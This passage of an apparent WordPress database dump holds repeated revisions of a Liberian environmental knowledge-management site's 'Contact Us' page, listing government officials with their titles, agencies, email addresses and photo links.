href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-24 11:04:05','2021-03-24 11:04:05','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3617,42,'2021-03-24 11:04:05','2021-03-24 11:04:05','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p><p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-24 11:04:05','2021-03-24 11:04:05','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3618,42,'2021-03-24 11:04:06','2021-03-24 11:04:06','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p><p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Anthony Kullie</strong><br />Director of LHS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Ernest M. Menseah </strong><br />Director of LGS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Wonpue Quellian </strong><br />Research Officer<br />MME<br /><a href=\"mailto:wonpuequellian2017@gmail.com\">wonpuequellian2017@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, 